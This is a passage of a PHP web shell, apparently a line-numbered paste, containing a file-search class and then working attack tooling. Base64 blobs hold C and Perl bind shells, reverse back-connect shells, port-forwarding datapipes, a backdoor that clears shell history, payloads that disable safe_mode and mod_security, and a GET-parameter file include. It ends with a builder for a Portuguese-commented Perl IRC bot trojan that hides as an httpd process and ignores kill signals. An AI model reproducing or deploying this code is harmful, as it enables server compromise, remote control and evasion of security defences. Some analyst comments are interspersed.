    function GetResultFiles() { return $this->ResultFiles; }
    // Scans every collected file for the search text.
    //   $phrase  when truthy, each space-separated word is wrapped in \b...\b (whole-word match)
    //   $case    when falsy, the pattern gets the 'i' (case-insensitive) modifier
    // The words are joined with '|' into a single capture group and used as a PCRE pattern
    // without preg_quote(), so the search text is interpreted as a regular expression and a
    // '/' in it ends the pattern early.
    function SearchText($phrase=0,$case=0) {
    $qq = @explode(' ',$this->text);
    $delim = '|';
      if($phrase)
        foreach($qq as $k=>$v)
          $qq[$k] = '\b'.$v.'\b';
      $words = '('.@implode($delim,$qq).')';
      $pattern = "/".$words."/";
      if(!$case)
        $pattern .= 'i';
      foreach($this->FilesToSearch as $k=>$filename)
      {
        $this->FileMatchesCount[$filename] = 0;
        // NOTE(review): `or @next` is not a loop-control statement, so an unreadable file is
        // not skipped by it. The loop below still runs against the failed read.
        $FileStrings = @file($filename) or @next;
        for($a=0;$a<@count($FileStrings);$a++)
        {
          $count = 0;
          $CurString = $FileStrings[$a];
          $CurString = @Trim($CurString);
          // Tags are stripped from the line before matching; no further HTML escaping is applied.
          $CurString = @strip_tags($CurString);
          $aa = '';
          if(($count = @preg_match_all($pattern,$CurString,$aa)))
          {
            // Wrap every match in a coloured, bold SPAN and store the line under its 1-based number.
            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
            $this->ResultFiles[$filename][$a+1] = $CurString;
            $this->MatchesCount += $count;
            $this->FileMatchesCount[$filename] += $count;
          }
        }
      }
      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
    }
  }
  // Returns the current Unix time as a float with microsecond precision, built from the
  // "usec sec" string that microtime() returns when called without arguments.
  function getmicrotime()
  {
    list($usec,$sec) = @explode(" ",@microtime());
    return ((float)$usec + (float)$sec);
  }
  2570. $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
  2571. A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
  2572. GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
  2573. b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
  2574. pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
  2575. NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
  2576. ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
  2577. ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
  2578. 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
  2579. 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
  2580. 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
  2581. dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
  2582. lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
  2583. $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
  2584. VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
  2585. JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
  2586. TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
  2587. lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
  2588. Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
  2589. Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
  2590. lIENPTk47DQpleGl0IDA7DQp9DQp9";
  2591. $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
  2592. aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
  2593. hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
  2594. sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
  2595. kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
  2596. KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
  2597. OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
  2598. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
  2599. BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
  2600. SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
  2601. KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
  2602. sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
  2603. Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
  2604. QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
  2605. Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
  2606. $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
  2607. x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
  2608. HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
  2609. aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
  2610. lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
  2611. xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
  2612. W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
  2613. LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
  2614. udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
  2615. 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
  2616. iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
  2617. KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
  2618. gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
  2619. hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
  2620. iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
  2621. ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
  2622. vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
  2623. AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
  2624. QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
  2625. ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
  2626. gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
  2627. wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
  2628. 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
  2629. MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
  2630. gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
  2631. 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
  2632. HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
  2633. dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
  2634. KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
  2635. ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
  2636. E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
  2637. Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
  2638. NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
  2639. J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
  2640. CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
  2641. dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
  2642. gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
  2643. lsZSk7DQogIHJldHVybiAwOw0KfQ==";
  2644. $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
  2645. CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
  2646. bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
  2647. gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
  2648. NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
  2649. iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
  2650. aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
  2651. SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
  2652. xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
  2653. WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
  2654. CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
  2655. yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
  2656. I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
  2657. m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
  2658. IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
  2659. lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
  2660. QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
  2661. CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
  2662. c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
  2663. NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
  2664. UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
  2665. DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
  2666. ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
  2667. 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
  2668. $port_bind_bd_cs="";
  2669. $back_connects="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KaWYgKCEkQVJHVlswXSkgew0KICBwcmludGYgIlVzYWdlOiAkMCBbSG9zdF0gPFBvcnQ+XG4iOw0KICBleGl0KDEpOw0KfQ0KcHJpbnQgIlsqXSBEdW1waW5nIEFyZ3VtZW50c1xuIjsNCiRob3N0ID0gJEFSR1ZbMF07DQokcG9ydCA9IDgwOw0KaWYgKCRBUkdWWzFdKSB7DQogICRwb3J0ID0gJEFSR1ZbMV07DQp9DQpwcmludCAiWypdIENvbm5lY3RpbmcuLi5cbiI7DQokcHJvdG8gPSBnZXRwcm90b2J5bmFtZSgndGNwJykgfHwgZGllKCJVbmtub3duIFByb3RvY29sXG4iKTsNCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAoIlNvY2tldCBFcnJvclxuIik7DQpteSAkdGFyZ2V0ID0gaW5ldF9hdG9uKCRob3N0KTsNCmlmICghY29ubmVjdChTRVJWRVIsIHBhY2sgIlNuQTR4OCIsIDIsICRwb3J0LCAkdGFyZ2V0KSkgew0KICBkaWUoIlVuYWJsZSB0byBDb25uZWN0XG4iKTsNCn0NCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGxcbiI7DQppZiAoIWZvcmsoICkpIHsNCiAgb3BlbihTVERJTiwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERPVVQsIj4mU0VSVkVSIik7DQogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOw0KICBwcmludCAiLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgU25JcEVyX1NBIHNuaXBlci1zYS5jb20gPT0tLSAgXG5cbiI7IA0Kc3lzdGVtKCJ1bnNldCBISVNURklMRTsgdW5zZXQgU0FWRUhJU1QgO2VjaG8gLS09PVN5c3RlbWluZm89PS0tIDsgdW5hbWUgLWE7ZWNobzsNCmVjaG8gLS09PVVzZXJpbmZvPT0tLSA7IGlkO2VjaG87ZWNobyAtLT09RGlyZWN0b3J5PT0tLSA7IHB3ZDtlY2hvOyBlY2hvIC0tPT1TaGVsbD09LS0gIik7IA0KICBleGVjIHsnL2Jpbi9zaCd9ICctYmFzaCcgLiAiXDAiIHggNDsNCiAgZXhpdCgwKTsNCn0=";
// Analyst notes on the three base64 literals below. The contents were obtained by decoding the
// literals. How each is used is not visible in this part of the file -- TODO confirm against
// the callers.
// $php_ini1 decodes to a single php.ini line that sets `safe_mode` to `Off`.
$php_ini1="c2FmZV9tb2RlICAgICAgICAgICAgICAgPSAgICAgICBPZmY=";
// $htacces decodes to an Apache <IfModule mod_security.c> block that sets SecFilterEngine and
// SecFilterScanPOST to Off. Detection: an unexpected .htaccess with these directives inside a
// web root is an indicator of tampering.
$htacces="PElmTW9kdWxlIG1vZF9zZWN1cml0eS5jPg0KICAgIFNlY0ZpbHRlckVuZ2luZSBPZmYNCiAgICBTZWNGaWx0ZXJTY2FuUE9TVCBPZmYNCjwvSWZNb2R1bGU+";
// $sni_res decodes to a short PHP script that prints the safe_mode and open_basedir ini values,
// include()s a path taken from a GET parameter, calls ini_restore() on both settings, prints
// them again and include()s a second GET-supplied path.
$sni_res="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsic3MiXSk7DQo/Pg==";
  2673.  
  2674. if(!empty($_POST['ircadmin']) AND !empty($_POST['ircserver']) AND !empty($_POST['ircchanal']) AND !empty($_POST['ircname']))
  2675. {
  2676. $ircadmin=$_POST['ircadmin'];
  2677. $ircserver=$_POST['ircserver'];
  2678. $ircchan=$_POST['ircchanal'];
  2679. $irclabel=$_POST['ircname'];
  2680. echo "<title>OverclockiX Shell-Connector || Connecting to $ircserver<title>";
  2681. echo "<body bgcolor=\"black\" text=\"green\">";
  2682. echo "Now Connecting to <b><font color=\"red\">$ircserver</font></b> in <b><font color=\"yellow\">$ircchan</font></b> Andministrators: <b><font color=\"yellow\">$ircadmin</font></b> Botname is <b><font color=\"yellow\">$irclabel</font></b>";
  2683. echo "<p>Dont Forget to Delete Loader.pl in /tmp</p>";
  2684. #######################################################
  2685. ######################IRC Trojan##########################
  2686. $file="
  2687. ################ CONFIGURACAO #################################################################
  2688. my \$processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps #
  2689. #----------------------------------------------################################################
  2690. my \$linas_max='48'; # Evita o flood :) depois de X linhas #
  2691. #----------------------------------------------################################################
  2692. my \$sleep='4'; # ele dorme X segundos #
  2693. ##################### IRC #####################################################################
  2694. my @adms=(\"$ircadmin\"); # Nick do administrador #
  2695. #----------------------------------------------################################################
  2696. my @canais=(\"$ircchan\"); # Caso haja senha (\"#canal :senha\") #
  2697. #----------------------------------------------################################################
  2698. my \$nick='$irclabel'; # Nick do bot. Caso esteja em uso vai aparecer #
  2699.                                               # aparecer com numero radonamico no final #
  2700. #----------------------------------------------################################################
  2701. my \$ircname = 'Linux'; # User ID #
  2702. #----------------------------------------------################################################
  2703. chop (my \$realname = `uname -a`); # Full Name #
  2704. #----------------------------------------------################################################
  2705. \$servidor='$ircserver' unless \$servidor; # Servidor de irc que vai ser usado #
  2706.                                               # caso n?o seja especificado no argumento #
  2707. #----------------------------------------------################################################
  2708. my \$porta='6667'; # Porta do servidor de irc #
  2709. ################ ACESSO A SHELL ###############################################################
  2710. my \$secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
  2711. ###############################################################################################
  2712. my \$VERSAO = '0.2';
  2713. \$SIG{'INT'} = 'IGNORE';
  2714. \$SIG{'HUP'} = 'IGNORE';
  2715. \$SIG{'TERM'} = 'IGNORE';
  2716. \$SIG{'CHLD'} = 'IGNORE';
  2717. \$SIG{'PS'} = 'IGNORE';
  2718. \$SIG{'STOP'} = 'IGNORE';
